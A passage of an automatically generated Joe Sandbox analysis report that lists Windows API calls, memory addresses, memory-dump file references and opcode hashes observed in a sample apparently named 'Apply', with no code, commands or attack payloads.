                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                    • String ID:
                                                    • API String ID: 490808831-0
                                                    • Opcode ID: d9b5e8f08751d9e0373584db932bef3c3245f9e4e9bd4973ebccf5848cb226c4
                                                    • Instruction ID: f446fd4073bd36927266f70b0c1d550fef1d22ac93488ebecc4699ec3fd06d26
                                                    • Opcode Fuzzy Hash: d9b5e8f08751d9e0373584db932bef3c3245f9e4e9bd4973ebccf5848cb226c4
                                                    • Instruction Fuzzy Hash: 7C012B37665270DAC62872389C8577E674AFB81B34F69011AF825DB1C2DF309C8183A3
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00894667,?,00000000,00000000,?,0088978A,?,?,00000002,00000000), ref: 00889714
                                                    • GetLastError.KERNEL32(?,0088978A,?,?,00000002,00000000,?,00885EB1,?,00000000,00000000,00000002,?,?,?), ref: 0088971E
                                                    • __dosmaperr.LIBCMT ref: 00889725
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                    • String ID:
                                                    • API String ID: 2336955059-0
                                                    • Opcode ID: a76cbf33b08cd19909c3fabe3d0ec041dafc8a1733b62a70db8e6863e172c9a1
                                                    • Instruction ID: 8f0631eebfa7746fe27d759397f4186c34796e945284765f1bcef7adffcbe16b
                                                    • Opcode Fuzzy Hash: a76cbf33b08cd19909c3fabe3d0ec041dafc8a1733b62a70db8e6863e172c9a1
                                                    • Instruction Fuzzy Hash: 03014733630118ABCB05BF99DC45CBE7B2AFB85330B280249F851DB290EA70DD11CBA1
                                                    APIs
                                                    • TranslateMessage.USER32(?), ref: 0085E11B
                                                    • DispatchMessageW.USER32(?), ref: 0085E129
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085E13F
                                                    • Sleep.KERNEL32(0000000A), ref: 0085E151
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 008A225F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                    • String ID:
                                                    • API String ID: 3288985973-0
                                                    • Opcode ID: 95af0250cf7aabba1e8b08d384953344f955af7870cf3e9c8ead4ba34d4962d1
                                                    • Instruction ID: 19b552731430be5666354c204b2b30189b3ed7ccccc0215a2ce9952e81ff3fce
                                                    • Opcode Fuzzy Hash: 95af0250cf7aabba1e8b08d384953344f955af7870cf3e9c8ead4ba34d4962d1
                                                    • Instruction Fuzzy Hash: 5CF05830604381ABEB348BA09C89FDA73A8FB84305F504928EA19D70C0EB70E48CDB12
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00861EA6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: CALL
                                                    • API String ID: 1385522511-4196123274
                                                    • Opcode ID: 440de3e178cf3d5b2da825e145a330022273852a301baffd5df233f935b51543
                                                    • Instruction ID: ed19360a5780f4e5decab27b57b9a32998e9c77d7180edcaded7a17b854f0ebf
                                                    • Opcode Fuzzy Hash: 440de3e178cf3d5b2da825e145a330022273852a301baffd5df233f935b51543
                                                    • Instruction Fuzzy Hash: 88228A70608201DFDB14DF18C488A2ABBF1FF85354F19891DF89ACB262E771E955CB92
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00893391
                                                      • Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017
                                                      • Part of subcall function 0085318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008531A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen
                                                    • String ID: X
                                                    • API String ID: 779396738-3081909835
                                                    • Opcode ID: c1d31ad33ebefae4f99b792a82caa7459928145244df85af91068eafbe0cb99d
                                                    • Instruction ID: e91c87e1aa835ae727af97246a8ea30d0fe5fd90117a5624a1ba0c573cc2fc81
                                                    • Opcode Fuzzy Hash: c1d31ad33ebefae4f99b792a82caa7459928145244df85af91068eafbe0cb99d
                                                    • Instruction Fuzzy Hash: F8216271A04248ABDF119F98D845BDEBBF9EF48315F044019E809E7241DBB45A8D8F61
                                                    APIs
                                                    • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,00859DE6,?,?,?), ref: 00859FAC
                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,00859DE6,?,?,?), ref: 0089F6F4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: File$PointerRead
                                                    • String ID:
                                                    • API String ID: 3154509469-0
                                                    • Opcode ID: 96a3195450373f753a3f1263615504283eceef8989b7f0bd37944517e4c129b6
                                                    • Instruction ID: 0bdddc83e845f9fe3944b53be48e8a96469d1f4cf87f1dbcdadeec3c1c6d7d86
                                                    • Opcode Fuzzy Hash: 96a3195450373f753a3f1263615504283eceef8989b7f0bd37944517e4c129b6
                                                    • Instruction Fuzzy Hash: 1F91E170A08209EBDF00DF68C8817A9BBB4FF05311F1881A5EDA9DF286D771E945DB61
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • SetErrorMode.KERNEL32(00000001), ref: 008C4985
                                                    • SetErrorMode.KERNEL32(00000000), ref: 008C4B48
                                                      • Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AttributesFile_wcslen
                                                    • String ID:
                                                    • API String ID: 4203446100-0
                                                    • Opcode ID: d818b317e428ef6624296cd014790fe64348fcf74c8fb455779db0177be1dcb2
                                                    • Instruction ID: d940b1d135434ce1189b04dd32ac7ff10dd9c96670fb234fe1169005417d26e1
                                                    • Opcode Fuzzy Hash: d818b317e428ef6624296cd014790fe64348fcf74c8fb455779db0177be1dcb2
                                                    • Instruction Fuzzy Hash: 50613371508340AFC300DF18C491A6AFBE5FF89318F44996EF8998B262D771D989CB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotificationSleep
                                                    • String ID:
                                                    • API String ID: 1821831730-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 670e704603af4a8be0a82eefe507b38d05c01a878b3d06671c455fcde44069ce
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 8631D570A00509DFC718CF58D484A69F7A6FB59364B24C6A5E409CB25AEB32EDC1CFD0
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00853A5A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 63ee594b49d02e66ec8a309b1fc3965d3e843f8d70641a31c4fdc841bcf40092
                                                    • Instruction ID: abd28973463949fbe2aae29c260e58b8c31855071a51b317fab134cee2780fe1
                                                    • Opcode Fuzzy Hash: 63ee594b49d02e66ec8a309b1fc3965d3e843f8d70641a31c4fdc841bcf40092
                                                    • Instruction Fuzzy Hash: DB3181B05087419FD721EF24D884797BBE4FB49749F00082DE9D9C7240E7B5AA49CB92
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 00855E30
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 008949F8
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 0fe9a656f1bf24056dd5e9e9428fce3548116395246070ea50a54200aeba2568
                                                    • Instruction ID: 3118544d22c28cdf523783927659660b0f367c9b184bd6f19aa7606d7eb7de66
                                                    • Opcode Fuzzy Hash: 0fe9a656f1bf24056dd5e9e9428fce3548116395246070ea50a54200aeba2568
                                                    • Instruction Fuzzy Hash: 96019E31245225BAE7301A2ACC0EF977F98FF02775F158301BE99AE1E0C7B45959CB90
                                                    APIs
                                                      • Part of subcall function 0088D191: GetEnvironmentStringsW.KERNEL32 ref: 0088D195
                                                    • _free.LIBCMT ref: 00881DBD
                                                    • _free.LIBCMT ref: 00881DC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$EnvironmentStrings
                                                    • String ID:
                                                    • API String ID: 3523873077-0
                                                    • Opcode ID: 93a76ac7b461ca5ea64e119d14f069c3ddb60aa708cf6b97cce7faef57554a06
                                                    • Instruction ID: 2e91908183b2fd5dab2c3e8f89605b9cb7243c5e0ffeed4343218ae3d0912c58
                                                    • Opcode Fuzzy Hash: 93a76ac7b461ca5ea64e119d14f069c3ddb60aa708cf6b97cce7faef57554a06
                                                    • Instruction Fuzzy Hash: 9AE02B67A45D1556AB71B23D7C09B6A164CEFD1374BA0072AFC20C71C2CE5088431397
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0085BD7E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID:
                                                    • API String ID: 1385522511-0
                                                    • Opcode ID: e33d3871a0a3c6a994c11ee34ea9cee8b7a16a967226dfe658df456e045edcb7
                                                    • Instruction ID: 016a7cdf6c1937eb0f6dcd37e2bca16751bbb8842e3c7d938d836044d406e397
                                                    • Opcode Fuzzy Hash: e33d3871a0a3c6a994c11ee34ea9cee8b7a16a967226dfe658df456e045edcb7
                                                    • Instruction Fuzzy Hash: AD32CB74A002099FDB20CF58C884ABAB7B6FF69319F188059ED05EB251D774EE85CF91
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91afc934c239498037c90cd105694a1a8e177516cd51ec66315b945575dfbfbd
                                                    • Instruction ID: 2a7deb24a9f910d739320a0ce58eea1e1f12e3ad4be6d6abf417ceeb1d412c43
                                                    • Opcode Fuzzy Hash: 91afc934c239498037c90cd105694a1a8e177516cd51ec66315b945575dfbfbd
                                                    • Instruction Fuzzy Hash: 40E1CF71A002199BCF18DF98C880AEEB7B5FF14316F448226ED16EB291E734C949CB57
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: b486fbfc7e1abbfb613f068d0eeba2f0e25d96720387700fa9c71f6d79af2d48
                                                    • Instruction ID: a31fd539fd33491e86272720a1618dfb78144bb286ec93cbc1e88d0ccde5d7f3
                                                    • Opcode Fuzzy Hash: b486fbfc7e1abbfb613f068d0eeba2f0e25d96720387700fa9c71f6d79af2d48
                                                    • Instruction Fuzzy Hash: 79D15C75A0420AEFCF14EF98C4819ADBBB5FF04314F14416AE915EB391EB30AE45CB91
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6747e11db40fa1d8616f09be44001e894f24e219702c606445a5e06ef53026a4
                                                    • Instruction ID: a6921557117da04df182a3791d328d99ee177a54c5c9b689b01a5455f0971065
                                                    • Opcode Fuzzy Hash: 6747e11db40fa1d8616f09be44001e894f24e219702c606445a5e06ef53026a4
                                                    • Instruction Fuzzy Hash: 8C510475A14108AFDB10DF69C840AA97BA2FF85364F19C168EA1CDB397C731ED42CB60
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 008BF9F8
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                    • Opcode ID: 9c602cb357bae4e961bd21866af2243c0edc452e9cc609d22f8aa1d6cc5362d3
                                                    • Instruction ID: 093da8d9e021ae32c67c8ebe3fafcfee391e70949b9b77f472177732d6cf02f2
                                                    • Opcode Fuzzy Hash: 9c602cb357bae4e961bd21866af2243c0edc452e9cc609d22f8aa1d6cc5362d3
                                                    • Instruction Fuzzy Hash: F9418172900209AFCB15DF68CC919EEB7B8FF44354B11953AEA5AD7352EB70DE048B50
                                                    APIs
                                                      • Part of subcall function 008554A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554AF
                                                      • Part of subcall function 008554A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008554C1
                                                      • Part of subcall function 008554A3: FreeLibrary.KERNEL32(00000000,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554D3
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00855184,?,00000001,?,?,00000000), ref: 00855510
                                                      • Part of subcall function 0085546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 00855475
                                                      • Part of subcall function 0085546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00855487
                                                      • Part of subcall function 0085546C: FreeLibrary.KERNEL32(00000000,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 0085549A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressFreeProc
                                                    • String ID:
                                                    • API String ID: 2632591731-0
                                                    • Opcode ID: ed2ce5aa9ac1360caf9efd1049ade0d6e660e55b3120f44d3cc5a36edb930834
                                                    • Instruction ID: e9fb60dfdff47cb957332a7f8a5a48da2e8b030a44507ed7ccacc0a1f9f5a743
                                                    • Opcode Fuzzy Hash: ed2ce5aa9ac1360caf9efd1049ade0d6e660e55b3120f44d3cc5a36edb930834
                                                    • Instruction Fuzzy Hash: C811E776600705AECF24BB28CC12FAD77A6FF50712F60842DF942EA1C1EE709A499B55
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: __wsopen_s
                                                    • String ID:
                                                    • API String ID: 3347428461-0
                                                    • Opcode ID: 871c9be2d8e7cc21ed2809a96f625e76cf67bb9d81bba012d8aeb9a873b07fd8
                                                    • Instruction ID: 96404f60e6e6b6c20c84a06f367c553d491456b3072e20383161e17f1c921860
                                                    • Opcode Fuzzy Hash: 871c9be2d8e7cc21ed2809a96f625e76cf67bb9d81bba012d8aeb9a873b07fd8
                                                    • Instruction Fuzzy Hash: CC11067590420AEFCB15EF58E94199A7BF5FF48314F104059F809EB211EA31DA21CB65
                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,00855B20,?,00010000,00000000,00000000,00000000,00000000), ref: 0085A03C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
